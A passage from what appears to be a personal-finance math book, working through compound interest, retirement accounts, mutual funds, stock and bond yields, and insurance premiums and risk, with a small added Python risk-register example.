FV = PV(1 + i)^n 
FV = $100.00(1 + 0.05)^50 
FV = $100.00(1.05)^50 
FV = $100.00(11.4674) 
FV = $1,146.74 


The $100 will grow to $1,146.74. 


Oh, see how it grows! The joys 
of making regular deposits 


In the preceding section, I explained how compounding works and 
why it makes your money grow much faster. Now imagine that 
instead of a one-time deposit (the $100 in the earlier examples) 
you make regular deposits over a long period of time, as you would 
with monthly deposits you make to a college savings plan or 
regular deposits you make to any savings plan where you want 
to have a fixed amount by a certain date in the future (like a 
Christmas Club account). 


To help you see how making regular deposits really boosts your 
bottom line, assume you have $100 per month to invest, and you’re 
trying to decide whether to squirrel it away under your mattress or 
invest it. Let the info in the following sections help you decide. 


Investment plan #1 — Money under the mattress 

In this scenario, every month, you tuck another $100 under 
your mattress. To determine how much you'll have at the end of 
50 years, use the following equation, in which FV is future value 
and p is the monthly payment: 


future value = monthly payment x 12 payments per year x 50 years
FV = p x 12 x 50
FV = p x 600
FV = $100.00 x 600
FV = $60,000.00


If you hide $100 per month under the mattress for 50 years, that’s 
600 payments. The (now lumpy) mattress has $60,000 under it. 
Not bad! 


Investment plan #2 — Money invested at 5 percent 


In this plan, you put your $100 per month into an investment that
pays 5 percent per year. To see how much you'll end up with in
this scenario, use this formula, in which FV is the future value, p is
the monthly payment, n is the number of payments (600 over
50 years), and i is the monthly interest rate (the annual rate of
5 percent divided by 12), which happens to be 0.004167.
FV = p[((1 + i)^n - 1) / i]
FV = $100.00[((1 + 0.004167)^600 - 1) / 0.004167]
FV = $100.00[(12.1194 - 1) / 0.004167]
FV = $268,013.96


Plan #2 produces $268,013.96, which makes it a much better deal
than Plan #1. Note: The Excel spreadsheet formula for this calculation
is =100*((1+0.05/12)^600-1)/(0.05/12).


These are pretty hairy formulas, right? To do more math with less
effort, consider going to an online calculator, such as
http://www.uic.edu/classes/actg/actg500/pfvatutor.htm.

The key is to always use the best tool. When the math gets tough, 
check the Internet for a calculator. 


Rounding Up Retirement Plans 


A pension is a fixed sum of money you get, usually monthly, most 
often (but not always) on retirement from a job. An exception is 
that you may get a spouse’s benefit, a widow’s benefit, or children’s 
benefit from the U.S. Social Security system. Here’s the lightning
round, summarizing retirement plans: 


Employer plans: These plans, known as defined benefit or 
defined contribution plans, are set up by employers for their 
employees, who have to meet certain eligibility requirements 
(like years of service and age) in order to receive the pension 
disbursements. A defined benefit plan tells you explicitly how 
much money you can look forward to in retirement. By contrast, 
a defined contribution plan has results based on how much 
money you put in. Small business employer plans are the SEP 
IRA and SIMPLE IRA. 


Personal plans: These are plans you create and maintain by 
yourself. Typically, the plans are the Individual Retirement 
Account (IRA) and Roth IRA. The benefit is based on how 
much and how frequently you put money into the plan. There 
may be certain tax advantages. To find out more, see the 
section “Calculating current and future tax advantages.” 




Government plans, such as Social Security: Social Security is 
a defined benefit plan, financed through payroll contributions 
that you and your employer make. You pay a Social Security 
tax throughout your employment years, and when you reach 
a specified age, you receive payments from the Social Security 
Administration. 


Some plans offer tax advantages. For example, in many plans, you 
don’t pay taxes on a portion of your contribution when it goes in. 
Also, some plans have an “employer match,” where the company 
puts in some money to match your contributions. 


The feisty 401(k)/403(b):
Defined contribution plans


Whether you work in the private sector or the public sector, your 
employer probably offers a defined contribution plan. A defined 
contribution plan is a retirement plan in which you decide how 
much money to put into it. What the account earns over time 
depends on how well the investment vehicle (one you choose from 
options offered by the company) does. Defined contribution plans 
have two key features: 


Tax deferred: Contributions are deducted from your paycheck
before taxes are calculated. You'll pay taxes later on these 
contributions (probably at a lower rate) when you retire at 
about age 65. 


Employer match: A generous employer may offer to match 
part of your contributions. For example, some employers 
match 50 percent of the first 6 percent of your contribution. 
What this means is that, if you put in 6 percent of your gross 
pay, your employer will match 50 percent of that. 

To figure the maximum employer match (based on 6 percent, 
for example), start by multiplying your annual salary by 0.06. 
Say you make $40,000.00 a year: 

$40,000.00 x 0.06 = $2,400.00 
Then calculate 50 percent (0.50) of that amount. 


$2,400.00 x 0.50 = $1,200.00 
You can still contribute more (often up to 10 percent of your
annual salary). However, the employer stops matching at 50 
percent of 6 percent. 


Financial advisors point out that the employer match is “free 
money,” and that you should take it. 


A 401(k) plan is the type of retirement plan you find at corporations 
and medium-sized businesses. A 403(b) plan is the type of 
retirement plan you find at public education organizations and 
some non-profit employers. 


If you “draw down” money early (which is allowed), you’re looking 
at severe penalties, and you'll be paying income taxes at your 
current rate. 


Adding up IRAs and their kin 


Some retirement plans are very similar to 401(k)/403(b) plans. 
Almost all of them offer a tax advantage. IRAs and Roth IRAs are 
personal retirement accounts. SEP IRAs and SIMPLE IRAs are 
popular in the world of small business. Here’s a summary: 


Individual Retirement Account (IRA): An IRA is your own personal
retirement account. You currently can “tax defer” up to
$5,000 per year (and $6,000 if you’re 50 or older), meaning you
pay no tax on that money now. When you make withdrawals
at around age 65, you pay taxes on principal and interest at a
lower marginal tax rate. See the section “Calculating current
and future tax advantages.” You can start making withdrawals
between ages 59½ and 70½.


Note: If you’re covered by a retirement plan at work, your 
personal IRA tax-deferred deduction may be limited or 
reduced to $0.00. 


Roth IRA: A Roth IRA is a variation of the IRA. You pay taxes
on your money before you put it into the plan, but you pay no 
taxes on principal or interest when you draw the money out. 


Simplified Employee Pension Individual Retirement 
Arrangement (SEP IRA): In a SEP IRA, you and your employer 
make contributions into a traditional IRA established in your 
name. There are tax advantages. 


Savings Incentive Match Plan for Employees Individual 
Retirement Account (SIMPLE IRA): Like the SEP IRA, the 
employee and employer make contributions to the employee’s 
account, and there are tax advantages. 
The dinosaur in the room:
Traditional defined benefit plans 


The defined benefit retirement plan is a vanishing entity. In a defined benefit plan, 
the company promises to pay you a specific amount every month after you retire. 
It’s usually determined by your wages, length of service, and age. 


These types of plans used to be the only retirement plans around. Unfortunately, 
many employers consider them too costly and have replaced them with defined
contribution plans. A few companies still have such plans, though. Municipal 
governments have them. Social Security and military retirement are defined benefit 
plans. 


The biggest difference between a SEP IRA and a SIMPLE IRA is 
contribution limits. If you’re an employee, your employer will have 
chosen one or the other. If you are a business owner, you’ll need 
to get professional advice from a tax expert. You can also use 
Publication 560 from the Internal Revenue Service:
http://www.irs.gov/pub/irs-pdf/p560.pdf.


Making sense of Social Security


The United States Social Security program is the largest government 
program in the world. It’s a retirement plan, with additional 
benefits for spouses, widows and widowers, children, and the 
disabled. 


A key component of Social Security is that the plan is a defined 
benefit plan. Basically, you put your money into Social Security 
during your working years (via payroll deductions), and when you 
retire, Social Security sends you monthly checks. 


What will your benefit be at retirement? Strictly speaking, the 
United States Social Security Administration (SSA) can’t tell you 
that until you apply for benefits. However, the SSA provides a 
calculator to help you estimate your benefit in today’s dollars or 
future inflated dollars. Visit
http://www.ssa.gov/retire2/AnypiaApplet.html.


If you use the online calculator, be prepared to enter many years’ 
worth of earnings. 
Calculating current and future
tax advantages


When it comes to taxes and retirement accounts, the U.S. government 
says, “You can pay me now, or you can pay me later.” If possible, 
try to pay later. When you retire, you are likely to be subject to a
lower marginal tax rate (also known as a tax bracket). 


Those brackets are currently 10, 15, 25, 28, 33, and 35 percent. 
During their working years, many people earn enough to be taxed 
at the 25 percent rate. When you retire and start drawing down a 
retirement plan, you will likely be in the 10 percent or maybe the 
15 percent bracket. 


So what should you do? Defer your taxes now and pay them later, 
after you retire, or pay them now and get your retirement money 
free and clear? Well, free and clear always sounds good, but is it 
the smartest choice financially? 


Say you have $50,000 in income and have to decide whether you 
want to defer taxes on $5,000 (a 10 percent IRA contribution) or 
pay them now. 


If you pay taxes on the $5,000 now when you’re in a higher tax 
bracket — say 25 percent — you'll pay $1,250 ($5,000 x 0.25 = 
$1,250). But if you defer those taxes until your retirement, when 
you will likely be in the 10 percent tax bracket, you'll pay only 
$500 ($5,000 x 0.10 = $500). 


Deferring the taxes on $5,000 saves you money. Paying less in taxes 
seems like a better deal than paying more. 


Social Security has an earnings limit. If you continue to make 
money when you're receiving Social Security, your benefit will be 
reduced. However, the Social Security Administration says that 
withdrawals from your IRA don’t count towards the Social Security 
earnings limit. 


Managing Mutual Funds 


A mutual fund is a collective investment. A mutual fund is a 
collection of, say, 30 or more securities. When you buy shares 
in a mutual fund, you own a little bit of all the securities within 
that fund. 
At 2011’s end, 7,581 mutual funds existed in the United States. With
over 7,500 funds to choose from, be assured that they come in all 
flavors. Here are several major types of funds: 


Stock (equity) funds: Stock funds are made up of collections
of common stocks. These are sometimes further broken into
groups based on market capitalization (micro cap, small cap,
mid cap, and large cap). That’s a sign of the size of the
companies.


Bond funds: Bond funds are groupings of bonds. They include
municipal bond funds and corporate bond funds. 


Growth funds and income funds: The names of these funds 
alert you to their purpose. Growth funds are collections of 
stocks with a likelihood of appreciating (increasing in price). 
Income funds are collections of stocks that have a good 
history of providing dividend income. For example, you may 
see funds with names like “Aardvark Small Cap Growth Fund” 
or “Aardvark Equity Income Fund.” 


Index funds: Index funds try to imitate the performance and 
yield of well-known indexes, such as the Standard & Poor’s 
500 (S&P 500) index. The theory is that if the fund “matches 
the Dow” or “matches the S&P,” then it’s doing as well as the 
stock market in general is doing. 


Paying attention to fees 


Running a mutual fund costs money, and the investors “pay the 
freight.” A fund’s expenses may be met by including sales charges 
(“sales loads”), 12b-1 fees (annual fees), management fees, 
transaction fees, and anything else the fund managers can think of. 


To complicate things, mutual funds usually have classes of shares: 
Class A, Class B, and Class C. These classes offer you choices in 
front-end loads, back-end loads, and 12b-1 fees: 


Class A shares usually charge a front-end sales load together 
with a small 12b-1 fee. I personally have paid 4.75 percent as a 
front-end load. 


Class B shares don’t have a front-end sales load. They have 
a “contingent deferred sales charge” that declines gradually 
over several years. They are back-loaded. They have a high 
12b-1 fee. Class B shares usually automatically convert to 
Class A shares after you’ve held them for a certain period, 
maybe six or seven years. 
Class C shares have no front-end or back-end load. They are
level-loaded shares. How can this be? The load is in the high 
12b-1 fee that you pay every year. 


Some mutual funds are no-load funds, which means there are no
front-end or back-end sales loads. There may be various fees, such 
as annual “maintenance” fees. However, if you can find a true 
no-load fund with no 12b-1 fees, more of your money goes into the 
actual investment. 


No-load funds are not automatically better. For example, a fund 
with a 5 percent front load that returns 15 percent annually 
outperforms a no-load fund with a 9 percent annual return. 


To calculate a load, just multiply the amount of your intended 
purchase by the advertised load. If you want to buy $10,000 worth 
of a fund with a 5 percent load, calculate: 


$10,000.00 x 0.05 = $500.00 


Some financial advisors consider Class C shares to be a marketing 
gimmick, trying to make them appear the same as no-load mutual 
funds. 


Figuring the average annual return 


Mutual funds are required to show their average annual return, 
which is an indicator of the fund’s performance. The U.S. Securities 
and Exchange Commission says so. The fund has to show the 
Ending Redeemable Value (ERV) — the end value of a hypothetical 
$1,000 payment (the model payment) at the end of 1-year, 5-year, 
and 10-year periods. 


Funds use the following formula to calculate ERV, where p is the 
model payment, t is the annual average return, and n is number of 
years: 


ERV = model payment x (1.00 + average annual return)^(number of years)
ERV = p(1 + t)^n
ERV = $1,000.00(1 + 0.05)^10
ERV = $1,000.00(1.05)^10
ERV = $1,000.00(1.62889)
ERV = $1,628.89
In this example, the fund has an average annual rate of return of
5 percent. Over 10 years, the value of an initial model payment of 
$1,000 increases to about $1,630. 


Considering Common Stocks 


A common stock is also called an equity. Typically, a corporation 
issues shares that people can buy on the stock exchange, and the 
stock is said to be publicly traded. Other stocks besides common 
stock exist, such as preferred stock, but common stock is the basic 
form of equity. 


Some people like to buy common stocks one security at a time. For 
example, they buy 100 shares of Intel or Procter & Gamble. Others 
like to buy shares in a stock mutual fund. See the earlier section 
“Managing Mutual Funds.” 


In any case, you usually buy stocks through your broker, who is
well-credentialed and functions as a trusted advisor. A broker not
only has credentials, but his company also has a research department,
which is supposed to do good analyses; that’s part of the
reason the brokerage house charges commissions.


A commission, of course, is a fee you pay to a broker to execute
a trade. It’s often based on the number of shares or their dollar
value. You pay a commission when you buy, and you pay another
commission when you sell.


You can also buy stocks online. When you do so, you’re on your 
own and must trust your own research and judgment. Trading 
online usually saves you money in commissions. 


Processing P/E ratios


A stock’s price-to-earnings ratio (commonly called the P/E ratio) is 
the relationship between a stock’s share price and its annual 
earnings per share. By knowing the P/E ratio, you can determine if 
a stock is a good performer. A P/E ratio that’s lower (a stock with a 
relatively low price and relatively high earnings) essentially means 
that you get a lot of earnings for the price. 


For example, a stock that sells for $38.62 per share with earnings of 
$2.86 per share has a P/E ratio of 13.5. That’s pretty good. 
A P/E ratio between 10 and 17 is considered to be good. A P/E
ratio greater than 25 suggests that a stock is possibly overpriced. 
A stock that sells at “high multiples” has attracted a lot of buyer 
interest (possibly irrational) and is sometimes called a glamour 
stock. For example, in 2011, a major fast-food chain had a P/E ratio 
of 52! 


The easiest way to calculate a P/E ratio is not to calculate it. Let 
someone else calculate and display it. It’s smart to visit websites 
such as Bloomberg: http://www.bloomberg.com.


Figuring your dividends 


A dividend is a payment a corporation makes to stockholders.
Usually, the company pays dividends four times a year. How much
you receive in dividends depends on how well the company did
and how many shares you own. If, for example, you own 100 shares
and the dividend is $0.21 per share, you’re going to get a check
for $21.


If a company’s stock doesn’t pay dividends, that’s okay. You (and
the company’s board of directors) may be more interested in the 
stock price going up (appreciating) than in dividends (income). 


Dividend yield is the percentage relationship between your annual 
dividend and the price at which you bought a stock. High yields 
are considered better. For example, if a stock you bought at $10 
per share pays $0.20 per share as a dividend, that’s a lot better 
than getting the same dividend from a stock that cost you $50 per 
share. You get more bang for your investment buck. 


To calculate dividend yield, you use this equation, where i is the 
dividends paid in a year and p is the market price: 


dividend yield = (dividends paid in a year / market price) x 100
Y = (i / p) x 100
Y = (($0.21 + $0.21 + $0.21 + $0.21) / $34.99) x 100
Y = ($0.84 / $34.99) x 100
Y = 0.024 x 100
Y = 2.40


The dividend yield is 2.40 percent. 
Investing in Bonds


A bond is a debt instrument. When you buy a bond, whether corporate 
or municipal, you're lending a corporation or a government entity 
a little money, and you'll receive interest until you sell the bond or 
it matures. 


Bonds generate income, not appreciation. Municipal bonds are 
usually free from federal income tax. And if the bond is for an 
entity in your own state, it’s probably free from state income tax, 
too. 


Calculating interest on bonds 


When you look up bonds on the Internet, you will likely see them 
described in a way similar to this: 


CALIFORNIA ST PUB WKS BRD REGENTS UNIV CALIF-SER E, 
5.00%, 04/01/2029 


Translation? This bond is a California municipal bond (a “muni”)
for the University of California system. It pays an annual interest
rate of 5.00 percent and (if you don’t sell it) will pay you a little 
money every quarter until April of 2029. Then you get all of your 
original investment back. 


In other words, the money you make with a bond comes in the 
form of interest (tax-free interest, to boot, in this case). To 
calculate what one year’s tax-free interest is, use this formula, 
where i is interest, p is principal, and r is the annual interest rate: 


interest = principal x rate
i = p(r)
i = $1,000.00(0.05)
i = $50.00


The example shows that a $1,000 bond earns $50 in interest in 
a year. 


Calculating yield 


Bond yield may be a little higher or lower than the interest rate.
Yield takes into account whether the bond is selling at a little
higher than $100 (people want it a lot) or a little less than $100
(people don’t want it very much). If you pay a little more, you actually
earn a little less. You'll still get interest at the “advertised”
rate, but yield is thought to be a more accurate reflection of a
bond’s real return on your investment.


To calculate bond yield, you use this equation: 


bond yield = (interest paid in a year / market price) x 100
Y = (i / p) x 100
Y = ($5.00 / $107.778) x 100
Y = 0.046391 x 100
Y = 4.60


A single bond purchase usually requires that you spend a minimum 
of $5,000. Most people can’t or won’t do that. Instead, they buy 
into a corporate or municipal bond mutual fund, where the 
purchase amount is more flexible (sometimes as little as $1,000). 


You use the same math to determine bond yield as you do for 
dividend yield. 


Chapter 12 


Covering Your Assets: 
Insurance Math 


In This Chapter 
Reviewing what insurance is and how it works 
Looking at the many terms used in insurance 
Looking at the numbers for the major types of insurance 


Life is uncertain, and people usually don’t welcome uncertainty.
That’s where the concept of insurance comes in. Insurance
won't prevent bad things (an automobile accident, a house fire,
or loss of life, for example) from happening, but it can reduce the
financial loss you face should they happen.


The idea behind insurance is that you trade a small known cost 
(the payment, called an insurance premium) against a larger 
unknown cost. In this chapter, I tell you how insurance works and 
explain the math you need to know to understand what you’re 
paying for. With insurance, the math consists of simple arithmetic 
you do and statistics that you don’t do but should understand. 


Honing in on How 
Insurance Works 


Simply put, insurance insures you against a “peril,” such as sickness,
fire, auto accidents, or death. You make payments (called premiums)
so that, if the peril happens to you, you can make a claim and the
insurance company pays in the amount and manner specified
in your policy. In some cases, the insurance company pays you
money for some of your financial loss; in other cases, the company
pays a service provider (the body shop you took your car to, for
example, or the doctors and hospital you saw when you broke
your leg).
When you're trying to decide how much coverage to buy and what
you can afford, you first need to understand how insurance works — 
a task that takes you into the labyrinthine world of actuaries and risk 
assessment, which I explain in the following sections. 

Here are a few terms you'll encounter in the world of insurance. 
Knowing them makes understanding the details easier: 


Premium: A premium is the amount of money charged for 
insurance. The term is used for all types of insurance.


Deductible: A deductible is the amount of money that you 
pay from your own pocket to a service provider (doctor, 
mechanic, contractor, and so on) before an insurer pays a 
benefit. Deductibles are common in automobile insurance 
and health insurance. For auto insurance, you pay a deductible
when you put in a claim for an accident. For example, if
you have a $250 deductible on your auto insurance and you 
get into a wreck that causes $3,000 worth of damage, you pay 
the first $250 and the insurance pays the rest. With health 
insurance, over the course of a year, you pay your medical 
expenses yourself until you “meet the deductible.” At that 
point, the insurer starts paying benefits. The next year, the 
deductible resets, and you have to do it all over again. 


Why do deductibles exist? If they didn’t exist, the premiums 
would be out of sight. An insurer feels that, without deductibles, 
people would put in a lot of trivial claims. 


 Copay: In health insurance policies, the copay is the amount 
of a healthcare bill that you pay when a service is provided. 
This isn’t the same as the premium, which you pay to the 
insurance company to buy the insurance. 


 Co-insurance: Co-insurance isn’t exactly the same as a copay. 
Whereas a copay is a fixed amount (you have a $20 copay 
when you go to the doctor’s office, for example), co-insurance 
is the percentage of the medical bill you’re later responsible 
for. If the bill is $200 and your co-insurance amount is 
30 percent, you pay $60 of the bill and the insurance 
company pays 70 percent ($140). 


Copays and co-insurance exist to prevent moral hazard. The 
purpose is to prevent people from seeking medical care that 
may not be necessary. The underlying philosophy is that, with 
no copay or co-insurance, you'll consume more care than you 
would if you weren’t paying anything. Insurers believe copays 
are necessary to keep insurance costs down. 
Lifetime maximum limits: Health insurance traditionally had
a lifetime maximum. A lifetime maximum was an expenditure 
cap. When you hit that amount, the insurance company 
wouldn’t pay another dime. It’s true that very sick people can 
run up big medical bills, but ultimately this limitation was 
perceived as too damaging to cancer patients and children 
with severely debilitating conditions. In the United States the 
Affordable Care Act has changed lifetime limits. So this is one 
term you no longer have to remember. 


Spreading risk around 


Insurance companies pay some or all of the costs people incur 
when a calamity strikes. Health insurance started this way — the 
insurance companies would protect patients from expenses associated
with emergencies, injuries, or major illnesses, but other
kinds of healthcare, like routine checkups or ordinary procedures, 
were simply paid for by the patients themselves. Health insurance 
has since absorbed the preventive and routine care portion and 
now contributes toward the payment of nonemergency healthcare 
expenses. 


So here’s the question: How can a business make money if it’s 
responsible for paying for things that, by their very nature, tend to 
be very expensive? The answer is by distributing risk over a large 
pool of people. 


For example, in a pool of 1,000,000 drivers, there may be 1,000 traffic 
accidents, making the probability that a driver will have an accident 
1 in 1,000. The risk is spread over the whole pool. All 1,000,000 
drivers pay a premium, but most drivers won’t have an accident. 
Instead, the premiums paid by the accident-free drivers help pay the 
benefit for the drivers who do have an accident. Not a bad deal. 


Evaluating risks 


You don’t know the exact chances of a peril happening to you, and 
your insurance company doesn’t know either. But the insurer does 
know the statistical chances of it happening. 


An actuary is a professional who analyzes risk and its financial 
impact. Many actuaries work at life insurance and health insurance 
companies, but they also figure risk for auto insurers. They can 
even determine when an appliance is likely to break down (and
therefore what the manufacturer should charge for an extended 
warranty). 


Here’s why the actuary’s job is important: The probability findings 
directly impact how much you pay for your coverage. Life insurance, 
for example, has always relied on life tables (also called mortality 
tables) developed by actuaries. It’s 100 percent certain that a 
person will die, but no one knows when. A life table shows the 
probability that a person of a certain age will die before his or her 
next birthday. From that, an insurer can figure the remaining life 
expectancy for people at different ages and base premiums on life 
expectancy. 


You won't be surprised to learn that after infancy, children have an 
excellent chance of living a long time. By contrast, people who are 
older (90 years of age, for example) have a poor chance of living 
another year. That’s why healthy, non-smoking young adults can 
get life insurance for a song, and the elderly have to throw in a
warm-up act, backup singers, and free backstage passes. 


Probabilistic risk assessment (PRA) is a term for evaluating risks, 
such as those associated with an airliner or a nuclear power plant. 
PRA deals with the likelihood of a detrimental outcome of an 
activity versus the severity of the detrimental outcome. The 
severity (also called the consequences) is expressed numerically 
(for example, number of people hurt or killed, acres destroyed, 
dollars lost, and so forth). Think of PRA as asking “What’s the worst
that could happen and what are the chances?” 


The risk level is basically the severity multiplied by the probability. 
The formula is 


risk level = hazard severity x likelihood of occurrence 


Life tables 


For most of history, evaluating risk wasn't an exact science. Farmers guessed about 
the likelihood of crop failure, and kings guessed about the likelihood of war. But 
around 1662, John Graunt in London got scientific about death. He noticed predictable
patterns when people in a group died. Graunt produced the first life table, based
on a statistical summary of real experience. To this day, insurance companies still 
rely on life tables, updated of course. 
Broadly, risk has these levels:


Low likelihood/low severity: You can pretty much ignore 
these risks. There’s not much chance they’ll happen, and if 
they do, there’s not much cost. Falling down the stairs would 
fall into this category. It’s not likely to happen, but if it does, 
fixing the damage may require only first aid. 


Low likelihood/high severity: Risks that fall into this level 
aren't likely to happen, but when they do, you are in deep 
trouble. For example, an auto accident isn’t a common 
occurrence, but it can produce severe bodily injury and costly 
property damage. 


High likelihood/low severity: These risks are moderate 
because, even though the chances of them happening are 
high, they usually don’t have a hugely detrimental effect. You 
just have to cope with them. An example of this type of risk 
includes cutting yourself while cooking. Here, a good strategy 
is to try to reduce the risk (by being careful when you’re 
slicing). 


High likelihood/high severity: These are top-priority risks 
and can mean big trouble. Those who live in areas subject to 
wildfires, hurricanes, and floods occasionally face this sort 
of risk and often have to evacuate their homes on very short 
notice. The best thing homeowners can do to minimize this 
risk is consider where they live. Flood insurance can help 
“hedge” against a flood and wind insurance may help with 
damage from hurricanes. For wildfires, you can reduce risk by 
keeping combustible brush at least 30 feet from the house. 
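
The risk-level formula and the four broad levels above, applied to a small risk register. This is an added example, not from the book: only the 1-in-1,000 accident rate comes from the text, while the dollar figures, the other probabilities, and the cut-offs for "high" are constructed assumptions.

```python
from dataclasses import dataclass

# Assumed cut-offs for "high" (not from the book); adjust to your own situation.
HIGH_LIKELIHOOD = 0.10    # chance of occurrence in a year
HIGH_SEVERITY = 10_000.0  # dollars lost per occurrence


@dataclass(frozen=True)
class Risk:
    name: str
    likelihood: float  # probability of occurrence in a year, 0.0 to 1.0
    severity: float    # dollars lost if it happens

    def __post_init__(self):
        # Reject inputs that would make the product meaningless.
        if not 0.0 <= self.likelihood <= 1.0:
            raise ValueError(f"{self.name}: likelihood must be between 0 and 1")
        if self.severity < 0:
            raise ValueError(f"{self.name}: severity cannot be negative")


def risk_level(risk):
    """risk level = hazard severity x likelihood of occurrence."""
    return risk.severity * risk.likelihood


def broad_level(risk):
    """Place a risk in one of the four broad levels."""
    likelihood = "High" if risk.likelihood >= HIGH_LIKELIHOOD else "Low"
    severity = "high" if risk.severity >= HIGH_SEVERITY else "low"
    return f"{likelihood} likelihood/{severity} severity"


def pool_premium(drivers, accidents, average_claim):
    """Premium per driver at which the pool's premiums exactly cover its
    claims (insurer expenses and profit are left out)."""
    if drivers <= 0 or not 0 <= accidents <= drivers:
        raise ValueError("need drivers > 0 and 0 <= accidents <= drivers")
    probability = accidents / drivers
    return probability * average_claim


def ranked(risks):
    """Sort risks so the highest risk level comes first."""
    return sorted(risks, key=risk_level, reverse=True)


# Constructed sample register (made-up figures, see the note above).
REGISTER = [
    Risk("fall down the stairs", 0.01, 200.0),
    Risk("auto accident", 0.001, 30_000.0),  # 1 in 1,000, as in the pool example
    Risk("cut while cooking", 0.5, 50.0),
    Risk("wildfire in a fire-prone area", 0.2, 250_000.0),
]

if __name__ == "__main__":
    for r in ranked(REGISTER):
        print(f"{r.name:32s} {broad_level(r):30s} ${risk_level(r):>12,.2f}")
    premium = pool_premium(1_000_000, 1_000, 30_000.0)
    print(f"premium per driver in the pool: ${premium:.2f}")
```

With these figures the auto accident and the kitchen cut get nearly the same risk level (about $30 and $25 a year) even though they sit in different broad levels, which is why the product alone does not tell you whether to insure against a risk or simply be careful.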


Underwriters 


In 1688, ship owners and merchants went to Lloyd's Coffee House in London to talk 
about their ships and the cargoes traveling on them. 


A sea voyage is risky business — the ship owner or merchant can lose
everything. A shipwreck can spoil your whole day. So bankers would accept some 
of the financial risk in exchange for a premium. They'd write their names under the 
risk information, and to this day those who accept risk are called underwriters. 


Today, Lloyd's of London is a giant insurance company. And Lloyd's coffee house? 
There's a historical plaque on Lombard Street in London, and the original storefront 
is on display at the National Maritime Museum. 


Determining premiums 


An insurance premium is the amount you pay for coverage. 
Premiums vary a lot, depending on a number of factors: 


The degree of “peril” you face: For example, as you grow 
older, life insurance costs more because the risk of dying is 
higher. The same is true if you are in a risky profession. With 
other lines of insurance, premiums vary if the insurer believes 
you are at greater risk. For example, a health insurer may 
want to charge you an increased premium if you’re a tobacco 
user. Teen drivers pay more for auto insurance than older, 
more experienced drivers. 


The cost of claims: Premiums grow because the cost of claims 
grows higher and higher. In the world of auto insurance, your 
premium may go up if you get into an accident. In health 
insurance, premiums rise regularly because of the increasing 
costs of healthcare. Also premiums for homeowners around 
the nation jumped up following Hurricane Katrina due to the 
costs the insurance companies incurred in the aftermath of 
that disaster. 


How much coverage you buy: A $20,000 life insurance policy 
costs twice as much as a $10,000 life insurance policy, for 
example. With auto insurance, the premium also depends 
on how much coverage you buy. For example, getting full 
coverage insurance costs more than getting only liability 
insurance. 


In all cases, the insurance company works out the statistics. Your 
real-life math job is to examine the coverages and compare the 
premiums. I tell you how in the next sections. 


Making Calculations about Your 
Own Lines of Insurance 


Life insurance, health insurance, automobile insurance, and 
homeowner’s insurance are the major personal lines that 
people buy. 


With some insurance, you can pick the amount of coverage and 
then compare premiums. Life insurance is sold in units (typically 
units of $1,000, the total making up the face amount of the policy), 
auto insurance is sold in varying amounts, and health insurance 
has plans with different deductibles and different benefits. Your 
math task related to insurance is usually to compare the coverage 
offered to the premiums charged and pick the plan that works best 
for you. 


A personal line of insurance covers individuals and their property. 
A business line of insurance covers business property (such as 
buildings and ships) and business activities (which may cause 
a professional liability). To split hairs, the health insurance your 
employer offers you is a business line, sold to the corporation 
by a corporate insurance agent. 


Auto insurance 


When you look for auto insurance (or evaluate the plan you 
already have), you need to consider things like the value of the 
vehicle you’re insuring and how much you can afford to pay as the 
consequences of an accident. Both affect the kind and amount of 
insurance you need and the amount you'll end up spending for it. 


Some coverage levels have minimums, mandated by the state you 
live in, but other coverages are flexible and will affect how much 
or how little you pay. 


When you review your auto insurance policy or look for a new 
policy, you’ll see separate charges for up to six items: property 
damage, bodily injury, collision, comprehensive, medical, and 
uninsured motorist coverage. There’s also a limited form of 
coverage called PLPD (personal or public liability and property 
damage insurance). 


Value of your vehicle 


What’s your car worth to you? Chances are it’s worth a lot less to 
the insurance company. Collision insurance pays for damage to 
your car (damage to the other driver’s car is covered by property 
damage insurance). Collision insurance also pays if you drive your 
car into a tree or your other car (as I did once). 


The amount of collision coverage will be “actual cash value less 
deductible.” After an accident, your insurer determines your car’s 
value and what it would cost to repair it; you can only select the 
deductible. (Of course, collision coverage may be optional, but 
you're taking your chances if you opt out.) 


Say your $22,000 car was worth $6,000 before an accident. If 
there’s a lot of damage (a total loss), the car may not be worth 
fixing. If the salvage value of the car is $500, the insurer doesn’t 
have to pay more than $5,500 in repairs. The company can take the 
car and just give you a check for $5,500. That’s what is meant by 
your car being “totaled.” 


Certain cars — performance cars, luxury cars, and cars that are 
most often stolen, for example — cost more to insure. Before you 
buy a new car, call up an insurance agent or go online to see what 
the going rate for insuring that kind of car is. 


Amount of deductible 


Sure, having a low deductible sounds great. After all, wouldn’t it 
be nice to not have to shell out anything (or shell out very little) in 
the event of an accident? However, low-deductible coverage costs 
more. So you need to balance the premium cost with the deductible 
amount before deciding. 


Auto insurers will not give you a cost comparison of deductibles 
versus premiums online. To make a comparison, you usually need 
to talk over the phone with an agent. When you see the impact of 
different deductibles on premiums, then you can subtract to see 
the savings from a higher deductible. 


Homeowner's insurance 


Homeowner’s insurance is useful for insuring your house against 
fire, theft, and a giant tree falling on the roof. Homeowner policies 
usually have some liability coverage (“slip-and-fall insurance”) in 
case someone’s injured on your property. Renter’s insurance is a 
variation of homeowner’s, intended for renters. 


When you’re buying insurance to cover theft or destruction of 
personal property, you may have a choice between actual cash 
value or replacement cost. 


Actual cash value: With actual cash value, in the event of a 
loss, the insurance company reimburses you the amount that 
the item is worth today. For example, if you have a lightning 
strike that wipes out your 3-year old TV, your 15-year old 
dishwasher, and your 1-year old computer, you get only what 
those items are worth today, regardless of what you paid for 
them new and how much they would cost to replace now. 
Bottom line: You probably couldn’t replace the lost items for 
what the insurance company will pay. 


Replacement cost: With replacement cost, the insurance 
company reimburses you for the amount that the lost item 
would cost if you were to buy a similar item at today’s prices. 
As you might imagine, replacement cost is the more expensive 
coverage. 


When you’re insuring personal property, you want to value the 
items you’re insuring. Make a list showing what you own, when 
you bought it, and how much it originally cost. (Digital photos 
are helpful, too, in case you have a dispute with the insurance 
company.) 


Health insurance 


Health insurance is trickier to understand than other kinds of 
insurance because of how complicated it is, due to various types of 
coverage, various deductibles, discounts negotiated between the 
service provider and the health insurance company, copays, 
co-insurance amounts, and so on. 


The best real-life math approach is to understand your health 
insurance policy (which isn’t always easy) and to keep track of 
your medical expenses. The following sections tell you what kind 
of info you have to wade through to make sense of your medical 
bills and how you can anticipate your share of the totals. 


Health insurance doesn’t insure your health. It insures you against 
a portion of your financial losses. The only real “health insurance” 
comes from diet, exercise, and regular doctor visits when you’re 
well. Be sure not to forget prenatal care, either. 


Deciphering your bill 


Even highly intelligent people can go insane trying to decipher 
their medical bills. Take a look at Figure 12-1, which shows a health 
